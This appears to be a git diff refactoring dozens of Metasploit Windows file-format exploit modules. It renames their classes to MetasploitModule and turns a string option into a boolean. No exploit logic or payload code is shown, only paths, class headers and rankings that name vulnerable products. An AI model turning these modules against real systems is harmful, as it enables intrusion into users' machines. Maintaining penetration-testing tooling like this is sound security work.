b/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb index 396176bf0d..9321d5dbc4 100644 --- a/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb index 4d85c1fae8..0862629e6e 100644 --- a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb +++ b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb index d807274f3f..b64b1dba03 100644 --- a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb +++ b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aol_phobos_bof.rb b/modules/exploits/windows/fileformat/aol_phobos_bof.rb index 53c044328a..fd2dddf5f8 100644 --- a/modules/exploits/windows/fileformat/aol_phobos_bof.rb +++ b/modules/exploits/windows/fileformat/aol_phobos_bof.rb @@ -29,7 +29,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb index ed6dd402c0..e656115c4d 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb index 3cb025d7c9..f52c94d008 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb index e2ef03ffb9..f8f8cb9c45 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audio_coder_m3u.rb b/modules/exploits/windows/fileformat/audio_coder_m3u.rb index 677b09c960..b46808db8f 100644 --- a/modules/exploits/windows/fileformat/audio_coder_m3u.rb +++ b/modules/exploits/windows/fileformat/audio_coder_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb index c59964b672..74d8300822 100644 --- a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb +++ b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audiotran_pls.rb b/modules/exploits/windows/fileformat/audiotran_pls.rb index 098c82121b..43aa6646dc 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb index 2d824873e9..7310aa459c 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb index cf3be4cdb6..41f0c09caa 100644 --- a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb +++ b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bacnet_csv.rb b/modules/exploits/windows/fileformat/bacnet_csv.rb index dd284bb9b9..35d8e5431d 100644 --- a/modules/exploits/windows/fileformat/bacnet_csv.rb +++ b/modules/exploits/windows/fileformat/bacnet_csv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb index 16f16399e7..27865cb896 100644 --- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb +++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb @@ -5,7 +5,7 @@ require "msf/core" -class Metasploit4 < Msf::Exploit +class MetasploitModule < Msf::Exploit Rank = NormalRanking diff --git a/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb b/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb index 9cce4f1ed1..44b52c9745 100644 --- a/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb +++ b/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb index e8e7b6feb9..1496c6bb45 100644 --- a/modules/exploits/windows/fileformat/blazedvd_plf.rb +++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb b/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb index eb1382c2c9..4d501e88fc 100644 --- a/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb +++ b/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bsplayer_m3u.rb b/modules/exploits/windows/fileformat/bsplayer_m3u.rb index ac074a89b7..a651c57417 100644 --- a/modules/exploits/windows/fileformat/bsplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/bsplayer_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ca_cab.rb b/modules/exploits/windows/fileformat/ca_cab.rb index a596d254fc..9fd6e8977a 100644 --- a/modules/exploits/windows/fileformat/ca_cab.rb +++ b/modules/exploits/windows/fileformat/ca_cab.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb index b9960e6c1d..7b13a94448 100644 --- a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb +++ b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb index 2eddd04730..23a4802477 100644 --- a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb index ead6de182e..6a250a4be3 100644 --- a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb +++ b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb b/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb index fd03303457..dc224d9809 100644 --- a/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb +++ b/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb b/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb index 672dd21363..6097c8fb34 100644 --- a/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb +++ b/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/csound_getnum_bof.rb b/modules/exploits/windows/fileformat/csound_getnum_bof.rb index 1e45c2bad9..50aaa3d7ed 100644 --- a/modules/exploits/windows/fileformat/csound_getnum_bof.rb +++ b/modules/exploits/windows/fileformat/csound_getnum_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cutezip_bof.rb b/modules/exploits/windows/fileformat/cutezip_bof.rb index f27d29a44c..4cdb568852 100644 --- a/modules/exploits/windows/fileformat/cutezip_bof.rb +++ b/modules/exploits/windows/fileformat/cutezip_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb index 171aa77b96..4e643c9134 100644 --- a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb +++ b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb index 74c7b8f7ea..27a7399113 100644 --- a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb +++ b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index 76ce8452b6..81e7b4eb61 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb index 3535ec9342..e28c56775c 100644 --- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb +++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb index dde740dc05..5b4ab37f1d 100644 --- a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb +++ b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb index ae6179ce9b..a23ea2c2ba 100644 --- a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb +++ b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/djvu_imageurl.rb b/modules/exploits/windows/fileformat/djvu_imageurl.rb index 1a4afb7f65..bb7f07e4d6 100644 --- a/modules/exploits/windows/fileformat/djvu_imageurl.rb +++ b/modules/exploits/windows/fileformat/djvu_imageurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb index 284effe31b..abf972e0bd 100644 --- a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb +++ b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb index 5e22d75d04..cb3d17c4bf 100644 --- a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb +++ b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb index 48e04da124..9ebe304e14 100644 --- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb +++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb index f63cae9376..3922c36d9f 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb index d1d7450d78..42a7a7b919 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb index c455d9abe3..e7c7606b63 100644 --- a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb +++ b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/etrust_pestscan.rb b/modules/exploits/windows/fileformat/etrust_pestscan.rb index 0985e0c229..f54e0fb9fb 100644 --- a/modules/exploits/windows/fileformat/etrust_pestscan.rb +++ b/modules/exploits/windows/fileformat/etrust_pestscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb index e13df2b8f0..8d41735dfb 100644 --- a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb +++ b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/fatplayer_wav.rb b/modules/exploits/windows/fileformat/fatplayer_wav.rb index 38686df93b..cf4f18cd37 100644 --- a/modules/exploits/windows/fileformat/fatplayer_wav.rb +++ b/modules/exploits/windows/fileformat/fatplayer_wav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/fdm_torrent.rb b/modules/exploits/windows/fileformat/fdm_torrent.rb index df64e35035..835441a161 100644 --- a/modules/exploits/windows/fileformat/fdm_torrent.rb +++ b/modules/exploits/windows/fileformat/fdm_torrent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/feeddemon_opml.rb b/modules/exploits/windows/fileformat/feeddemon_opml.rb index fd9a115fca..e19d9777bf 100644 --- a/modules/exploits/windows/fileformat/feeddemon_opml.rb +++ b/modules/exploits/windows/fileformat/feeddemon_opml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb index f5da05ca0a..db56b8840e 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb index 1f9be2a724..512ca932fd 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/foxit_title_bof.rb b/modules/exploits/windows/fileformat/foxit_title_bof.rb index 166a9cfee8..9c9f4b3566 100644 --- a/modules/exploits/windows/fileformat/foxit_title_bof.rb +++ b/modules/exploits/windows/fileformat/foxit_title_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb index 9be4a7dc85..7dd33fd5e9 100644 --- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb +++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb index 7e82c08be2..1049ee46b0 100644 --- a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb +++ b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/gsm_sim.rb b/modules/exploits/windows/fileformat/gsm_sim.rb index e2019f38cc..0fd7b4a82e 100644 --- a/modules/exploits/windows/fileformat/gsm_sim.rb +++ b/modules/exploits/windows/fileformat/gsm_sim.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/gta_samp.rb b/modules/exploits/windows/fileformat/gta_samp.rb index 8fda60248c..99bfd109cf 100644 --- a/modules/exploits/windows/fileformat/gta_samp.rb +++ b/modules/exploits/windows/fileformat/gta_samp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index 541f6ac734..96e6b9cb59 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb index b7cb7a9e32..3eaa4f66bf 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb index 24ae5f20f2..90d48de952 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb index dd83c0b103..be882ba496 100644 --- a/modules/exploits/windows/fileformat/homm3_h3m.rb +++ b/modules/exploits/windows/fileformat/homm3_h3m.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb index 468b74316a..2d4cb835fd 100644 --- a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb +++ b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb index b4ed4d9963..8ee1a341ad 100644 --- a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb +++ b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include REXML diff --git a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb index 9040c45a16..6905619ea8 100644 --- a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb +++ b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 